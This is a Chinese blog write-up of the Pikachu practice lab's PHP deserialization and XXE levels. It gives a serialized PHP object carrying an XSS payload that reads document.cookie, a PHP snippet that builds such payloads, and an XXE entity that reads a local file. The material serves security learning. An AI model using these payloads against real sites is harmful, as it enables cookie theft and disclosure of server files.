pikachu靶场 PHP反序列化、XXE

最新推荐文章于 2024-02-11 14:00:00 发布
最新推荐文章于 2024-02-11 14:00:00 发布
阅读量777 收藏
点赞数
分类专栏: 靶场 文章标签: php 开发语言 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52746128/article/details/127182726
版权

目录

PHP反序列化漏洞

XXE漏洞

PHP反序列化漏洞

直接拿概述里的payload试试,O:1:"S":1:{s:4:"test";s:29:"<script>alert('xss')</script>";},看到弹窗,把第二个s后面的29改成39,把alert('xss')改成alert(document.cookie),再提交试试

至于不知道怎么写payload,用浏览器访问这个php文件试试,payload那行要写什么先想好,访问后会直接解析将序列化后的payload显示出来,但script的内容不显示,从检查里面给它复制出来拼接好再去靶场输入,或者直接找在线的php工具

<?php
	class R{
		var $tmd="rnmd";
	}
	$r= new R();
	$payload="<script>alert(document.cookie)</script>";
	$r->tmd=$payload;
	echo serialize($r);
?>

查看源码可以看到反序列化后的结果并没有被转义或者过滤,从而导致了恶意代码被当成正常代码运行

 

XXE漏洞

我没学过XML啊(愁眉苦脸),只能靠百度了,百度了一番,说是什么XML是被用来结构化、存储和传输信息的

<?xml version = "1.0"?>  //XML声明部分
//文档类型定义↓
<!DOCTYPE ANY [          
    <!ENTITY try SYSTEM "C://1.txt">    
]>
    //↑定义实体类型,引用外部url
<name>&try;</name>       //XML引用

大致意思就是要写段xml代码执行读取系统里的某个文件,这里书接上回继续读1.txt文件

但是呢,php常用的libxml目前都是禁止解析外部实体内容的(目前版本都超过2.9了),意思就是这个漏洞存在的可能性很低

Al_1
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pikachu靶场全部通关.pdf
08-16
由于在有道云写的,不好发博客,只能这样子,个人结合B站视频,总结
php-SER-libs-main反序列化靶场通关详细思路
qq_73767109的博客
05-30 3724
这里先是要把my类实例化到body中,而project要是my中不存在的方法,理应随便赋值但是在触发__call后call需要输入两个参数,name可以自行赋值,但是func就要在触发时就有参数,所以在给project赋值的时候应该赋参数这样在。主要利用的是session.upload_progress.enabled 当该设置为on 的时候,在向服务器上传任意一个文件的时候php会把该上传文件的详细信息(如上传时间,文件名等)储存在session中,而当我们以。新手学习反序列化
iwebsec靶场PHP反序列化
果粒程
03-08 672
iwebsec靶场PHP反序列化
Pikachu靶场——PHP反序列化漏洞
来日可期的博客
09-30 1596
序列化是将对象转换为字节流或其他可传输格式的过程,以便将其存储在文件中、通过网络发送或在内存中保存。反序列化是将序列化的数据重新还原为对象的过程。反序列化漏洞通常出现在不正确或不安全反序列化实现中。攻击者可以构造恶意的序列化数据,利用漏洞触发远程代码执行、拒绝服务攻击、信息泄露等安全问题。
pikachu-php反序列化源码分析及修复
静水流深,沧笙踏歌
09-08 1370
在理解这个漏洞前,你需要先搞清楚php中serialize(),unserialize()这两个函数。             序列化serialize()            ...
反序列化漏洞靶场
最新发布
leah126的博客
02-11 1610
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。此外,还将收集网上一些其他常用框架的反序列化链,对收录的所有反序列化链进行漏洞分析复现,并给出自己的 poc,以供参考。Laravel_5.4.0_9.3.6+_反序列化链_RCE1。
pikachu靶场全通关教程
07-20
这个是刚开始学网络安全渗透的靶场练习心得,分享给大家
pikachu靶场网盘下载
04-01
pikachu是一个漏洞练习平台。其中包含了常见的web安全漏洞,如果你是一个渗透测试学习者没有靶场练手,那么pikachu将是一个不错的选择。
pikachu靶场环境
02-12
pikachu靶场环境
web渗透教程1:pikachu靶场搭建
11-17
带你手把手搭建pikachu靶场环境
Web安全 PHP反序列化漏洞的 测试.(可以 防止恶意用户利用漏洞)
网络安全领域___专研者.
03-25 4477
PHP反序列化漏洞的 概括: 开发的程序员 没有对用户输入的序列化字符串做一个严格检测,导致恶意的用户可以控制反序列化的一个过程,因此导致XSS漏洞,代码执行,SQT注入,目录遍历等不可控后果。在反序列化的过程中自动触发了某些魔术方法。在进行反序列化的时候就有可能触发对象中的一些魔术方法。
Web安全--反序列化漏洞详解(php篇)
bobo_milk的博客
11-29 1063
反序列化
pikachu PHP反序列化(皮卡丘漏洞平台通关系列)
箭雨镜屋
01-30 3478
诶嘿,又是一个简单的关卡 1、学习,学习一下 先跟着pikachu简单学习一下什么叫序列化和反序列化: 但其实我已知这里有两个地方写的不对,需要更正一下: (1)序列化结果中的S不是对象名称,而是类名称;同样的,O和S中间的1应该是类名字长度。 (2)几个魔法函数的举例有点让人误会,很容易误以为这些魔法函数都会造成反序列化漏洞,但其实__construct()在unserialize()时并不会被自动调用,这点在之后会进行演示。 总之,序列化是把对象转换为字符串,从而达到传输和存储的目的
Pikachu靶场-PHP反序列化
众生度尽,方证菩提
12-31 187
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
PHP反序列化漏洞——云演
weixin_46601374的博客
03-19 2090
昨天搞了搞掌控的反序列化,突然想到当时打CTF时老师给我们冲了个云演的靶场, 就去看了看,也有反序列化漏洞 顺手搞搞加深一下印象 第一题 点进去后是这样的 还记得昨天的 php中有一类特殊的方法叫“Magic function”(魔术方法), 这里我们着重关注一下几个: __construct():当对象创建(new)时会自动调用。但在unserialize()时是不会自动调用的。(构造函数) __destruct():当对象被销毁时会自动调用。(析构函数) __w...
vulnhub靶场serial-php渗透
问彡心的博客
07-31 1326
整个渗透过程中主要漏洞在于反序列化的利用配合远程文件包含,将wel的对象替换,由于恰好Log对象中存在handler函数且有文件包含,才能进行利用,我把这招称之为"偷梁换柱",还是很形象的,当执行一句话木马时,离成功也就不远了,随之从反弹终端中得到的账户密码进行远程登陆,在执行命令过程中通过提示发现了sudo下的vim是可以直接执行的,在vim命令行中有!command暂时离开vim到指令列模式下执行command的显示结果,利用此功能成功借用了bash来执行输入的命令httpshttps。...
小白初见PHP反序列化漏洞
mastergu2的博客
08-08 185
这里是一个PHP都不熟悉的小白同学,预习一下PHP反序列化 首先看下这个 class是声明一个类S,public模式的变量test 用new运算符来创立对象s 接着用序列化函数处理对象s 输出如下 O:代表object 1:代表对象名字长度为一个字符 S:对象的名称 1:代表对象里面有一个变量 s:数据类型 4:变量名称的长度 test:变量名称 s:数据类型 7:变量值的长度 pikachu:变量值 那么反序列化呢就是这
Pikachu漏洞靶场 PHP反序列化
柠檬i的博客
04-08 598
序列化serialize() 序列化说通俗点就是把一个对象变成可以传输的字符串。 反序列化unserialize() 就是把被序列化的字符串还原为对象,然后在接下来的代码中继续使用。
pikachu靶场 :十二、PHP反序列化
qq_43233085的博客
02-02 1304
pikachu靶场 :十二、PHP反序列化概论漏洞输出xss文件读取 概论 在理解这个漏洞前,你需要先搞清楚php中serialize(),unserialize()这两个函数。 序列化serialize() 序列化说通俗点就是把一个对象变成可以传输的字符串,比如下面是一个对象: class S{ public $test="bihuoedu"; } $s=new S(); //创建一个对象...
pikachu靶场xxe漏洞
09-07
pikachu靶场xxe漏洞是指在该靶场中存在的XML外部实体攻击漏洞。通过构造恶意内容,攻击者可以利用这个漏洞读取任意文件、执行系统命令、探测内网端口、攻击内网网站等危害。[1]这个靶场提供了一个接收XML数据的API...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值